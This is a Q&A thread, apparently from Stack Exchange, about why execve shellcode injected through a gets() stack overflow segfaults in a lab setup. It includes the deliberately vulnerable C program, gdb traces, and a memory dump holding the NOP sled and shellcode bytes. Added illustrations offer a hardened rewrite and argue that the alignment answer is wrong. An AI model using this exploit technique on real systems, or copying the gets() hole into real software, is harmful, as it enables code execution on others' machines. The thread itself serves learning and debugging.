Reputation: 298
Basic C program with an obvious buffer overflow:
#include <stdio.h>

/* Deliberately vulnerable: gets() has no bound, so input longer than
   100 bytes runs past buf and over the saved frame pointer and
   return address of f(). */
void f(){
    char buf[100];
    gets(buf);
    printf("Hello exploit");
}

int main(){
    f();
    return 0;
}
Shellcode for the correct system: http://www.shell-storm.org/shellcode/files/shellcode-811.php I've put a NOP sled at the front and the correct return address at the back.
When running the exploit in gdb, I can see that the return address is correctly altered, the execution jumps to my nop sled and continues with the shellcode. I can step through the start of the shellcode, but it segfaults near the end.
(gdb) c
Continuing.
Breakpoint 4, 0xbffff710 in ?? ()
1: x/i $pc
=> 0xbffff710: xor %eax,%eax
(gdb) stepi
0xbffff712 in ?? ()
1: x/i $pc
=> 0xbffff712: push %eax
(gdb) stepi
0xbffff713 in ?? ()
1: x/i $pc
=> 0xbffff713: push $0x68732f2f
(gdb) stepi
0xbffff718 in ?? ()
1: x/i $pc
=> 0xbffff718: push $0x6e69622f
(gdb) stepi
0xbffff71d in ?? ()
1: x/i $pc
=> 0xbffff71d: mov %esp,%ebx
(gdb) stepi
0xbffff71f in ?? ()
1: x/i $pc
=> 0xbffff71f: mov %eax,%ecx
(gdb) stepi
0xbffff721 in ?? ()
1: x/i $pc
=> 0xbffff721: mov %eax,%edx
(gdb) stepi
0xbffff723 in ?? ()
1: x/i $pc
=> 0xbffff723: mov $0x2f,%al
(gdb) stepi
0xbffff725 in ?? ()
1: x/i $pc
=> 0xbffff725: bound %ebp,0x6e(%ecx)
(gdb) stepi
Program received signal SIGSEGV, Segmentation fault.
The program has an executable stack (execstack -s vulnerableApp) and ASLR is off.
So three questions:
-- Edit: I forgot to mention that I've used this shellcode on the same system to exploit a different binary and it worked.
UPDATE
Yes, the shellcode is delivered in its entirety:
0xbffff6f6: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff706: 0x90909090 0x90909090 0xc0319090 0x2f2f6850
0xbffff716: 0x2f686873 0x896e6962 0x89c189e3 0xcd0bb0c2
0xbffff726: 0x40c03180 0xf48680cd 0x8400bfff 0x00000804
0xbffff736: 0x00000000 0x44d30000 0x0001b7e4 0xf7d40000
You can see the sled, followed by the exploit.
Upvotes: 1
Views: 3635
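As an added illustration (not part of the question or of either answer): a hardened replacement for the f() above, in which the unbounded gets() is swapped for a bounded reader that reports an overlong line instead of writing past buf. The names read_line_bounded, f_safe, probe_line and run_on_input are mine; BUF_SIZE matches the 100-byte buffer in the question, and the inputs fed to it are constructed for the example.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 100

/* Result codes for read_line_bounded(). */
enum { LINE_OK = 0, LINE_EOF = 1, LINE_TRUNCATED = 2 };

/* Reads one line into buf (at most size-1 bytes, always NUL-terminated).
 * Unlike gets(), it never writes past buf. If the line did not fit, the
 * rest of it is drained from the stream and LINE_TRUNCATED is returned, so
 * the caller can reject the input instead of silently using a partial line. */
int read_line_bounded(FILE *in, char *buf, size_t size) {
    if (size == 0) return LINE_TRUNCATED;
    if (fgets(buf, (int)size, in) == NULL) { buf[0] = '\0'; return LINE_EOF; }
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') { buf[len - 1] = '\0'; return LINE_OK; }
    /* No newline in the buffer: the line filled it exactly, the input ended
       without a newline, or the line is too long. Peek one char to decide. */
    int c = fgetc(in);
    if (c == EOF || c == '\n') return LINE_OK;
    while (c != '\n' && c != EOF) c = fgetc(in);   /* drain the oversized line */
    return LINE_TRUNCATED;
}

/* Hardened counterpart of the question's f(): identical output for
   well-formed input, but an overlong line is reported instead of
   overwriting the saved return address. Returns 0 on success, 1 if rejected. */
int f_safe(FILE *in) {
    char buf[BUF_SIZE];
    int rc = read_line_bounded(in, buf, sizeof buf);
    if (rc == LINE_TRUNCATED) { fputs("input too long\n", stderr); return 1; }
    printf("Hello exploit\n");
    return 0;
}

/* Test helper: run read_line_bounded() over a constructed string with a
   caller-chosen buffer size, via a temporary file (standard C only). */
int probe_line(const char *input, char *out, size_t size) {
    FILE *fp = tmpfile();
    if (!fp) return -1;
    fputs(input, fp);
    rewind(fp);
    int rc = read_line_bounded(fp, out, size);
    fclose(fp);
    return rc;
}

/* Test helper: feed a constructed string to f_safe(). */
int run_on_input(const char *input) {
    FILE *fp = tmpfile();
    if (!fp) return -1;
    fputs(input, fp);
    rewind(fp);
    int rc = f_safe(fp);
    fclose(fp);
    return rc;
}

int main(void) {
    /* Constructed input: 298 'A's plus newline, well past the 100-byte buffer. */
    char longline[300];
    memset(longline, 'A', sizeof longline - 2);
    longline[sizeof longline - 2] = '\n';
    longline[sizeof longline - 1] = '\0';
    printf("short line -> %d\n", run_on_input("hello\n"));
    printf("long line  -> %d\n", run_on_input(longline));
    return 0;
}
```

The peek after a newline-less fgets() is what distinguishes a line that filled the buffer exactly from one that was cut off; draining the remainder keeps a later read from treating the tail of the long line as fresh input.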
Reputation: 11
Had the same problem here. The point of the trouble is that your NOP sled isn't a multiple of 4/8 bytes. The instruction "0xc0319090 0x2f2f6850" (NOPs and instructions mixed up) leads to a shift (here a 2-byte shift) in the shellcode, until at some point the CPU isn't able to interpret the shellcode because of an incomplete instruction --> Segmentation Fault
Upvotes: 1
Reputation: 298
I fixed this by adding a small NOP sled after the shellcode. Since the shellcode was added to the stack at the end of the buffer, and it pushes some things onto the stack itself, it was overwriting its own code.
Upvotes: 2
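The self-overwrite this answer describes can be checked against the gdb session by plain address arithmetic. The C program below is an added example, not code from the question or from either answer. The layout it uses is my reading of the transcript, not something the poster states: the 28-byte shellcode (bytes taken from the memory dump) starts at 0xbffff710, where the breakpoint hit, so it ends at 0xbffff72c; the saved return address occupies the next dword, and after `ret` pops it ESP is 0xbffff730 when `xor %eax,%eax` executes. IMG_BASE and the function names are constructed for the example. The replay reproduces the two odd decodes in the transcript, `mov $0x2f,%al` at 0xbffff723 and `bound %ebp,0x6e(%ecx)` at 0xbffff725, which are the tail of the shellcode after the "/bin" push has landed on it.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed layout, inferred from the gdb session (see lead-in). */
#define SC_BASE   0xbffff710u   /* first shellcode byte: xor %eax,%eax      */
#define ESP_ENTRY 0xbffff730u   /* ESP after ret has popped the return slot  */

/* The 28 shellcode bytes as they appear in the poster's memory dump. */
static const uint8_t shellcode[28] = {
    0x31, 0xc0,                         /* xor  %eax,%eax            */
    0x50,                               /* push %eax                 */
    0x68, 0x2f, 0x2f, 0x73, 0x68,       /* push $0x68732f2f  "//sh"  */
    0x68, 0x2f, 0x62, 0x69, 0x6e,       /* push $0x6e69622f  "/bin"  */
    0x89, 0xe3,                         /* mov  %esp,%ebx            */
    0x89, 0xc1,                         /* mov  %eax,%ecx            */
    0x89, 0xc2,                         /* mov  %eax,%edx            */
    0xb0, 0x0b,                         /* mov  $0xb,%al             */
    0xcd, 0x80,                         /* int  $0x80                */
    0x31, 0xc0, 0x40, 0xcd, 0x80        /* xor %eax,%eax; inc %eax; int $0x80 */
};

/* How many shellcode bytes the first `npush` dword pushes overwrite.
   The pushes store into [esp - 4*npush, esp), so the answer is the size
   of that range's overlap with [sc_base, sc_base + sc_len). */
size_t clobbered_bytes(uint32_t sc_base, size_t sc_len, uint32_t esp, unsigned npush) {
    uint32_t sc_end = sc_base + (uint32_t)sc_len;
    uint32_t lo = esp - 4u * npush;
    uint32_t a = sc_base > lo ? sc_base : lo;
    uint32_t b = sc_end < esp ? sc_end : esp;
    return b > a ? (size_t)(b - a) : 0;
}

/* A 64-byte image of the stack around the shellcode; image[0] models IMG_BASE. */
#define IMG_BASE 0xbffff700u
#define IMG_LEN  0x40

/* Lay the shellcode into a sled-filled image and replay its three pushes
   (eax is 0 after the xor, then the two string dwords). */
void replay_pushes(uint8_t image[IMG_LEN]) {
    memset(image, 0x90, IMG_LEN);                        /* NOP sled, as in the dump */
    memcpy(image + (SC_BASE - IMG_BASE), shellcode, sizeof shellcode);
    const uint32_t pushed[3] = { 0x00000000u, 0x68732f2fu, 0x6e69622fu };
    uint32_t esp = ESP_ENTRY;
    for (int i = 0; i < 3; i++) {
        esp -= 4;                                        /* push: decrement, then store LE dword */
        for (int k = 0; k < 4; k++)
            image[(esp - IMG_BASE) + k] = (uint8_t)(pushed[i] >> (8 * k));
    }
}

uint8_t byte_at(const uint8_t image[IMG_LEN], uint32_t addr) {
    return image[addr - IMG_BASE];
}

/* 1 if the replayed image carries the exact bytes gdb decoded at
   0xbffff723 (b0 2f: mov $0x2f,%al) and 0xbffff725 (62 69 6e: bound). */
int replay_matches_gdb(void) {
    uint8_t img[IMG_LEN];
    replay_pushes(img);
    return byte_at(img, 0xbffff723u) == 0xb0 && byte_at(img, 0xbffff724u) == 0x2f &&
           byte_at(img, 0xbffff725u) == 0x62 && byte_at(img, 0xbffff726u) == 0x69 &&
           byte_at(img, 0xbffff727u) == 0x6e;
}

int main(void) {
    size_t hit = clobbered_bytes(SC_BASE, sizeof shellcode, ESP_ENTRY, 3);
    printf("pushes overwrite %zu shellcode bytes\n", hit);
    printf("replay matches gdb decode: %s\n", replay_matches_gdb() ? "yes" : "no");
    /* Moving the shellcode `hit` bytes lower (the pad after it that the
       answer describes) takes the code out of the range the pushes write. */
    printf("with %zu pad bytes after it: %zu bytes hit\n", hit,
           clobbered_bytes(SC_BASE - (uint32_t)hit, sizeof shellcode, ESP_ENTRY, 3));
    return 0;
}
```

The first push only overwrites the spent return-address slot; the second and third walk down into the last eight bytes of the code, which is why the `mov $0xb,%al` / `int $0x80` pair has become `mov $0x2f,%al` followed by garbage by the time execution reaches it. This is also why the other answer's alignment explanation does not fit: the disassembly was correct up to 0xbffff721 and only diverges at the bytes the pushes touched.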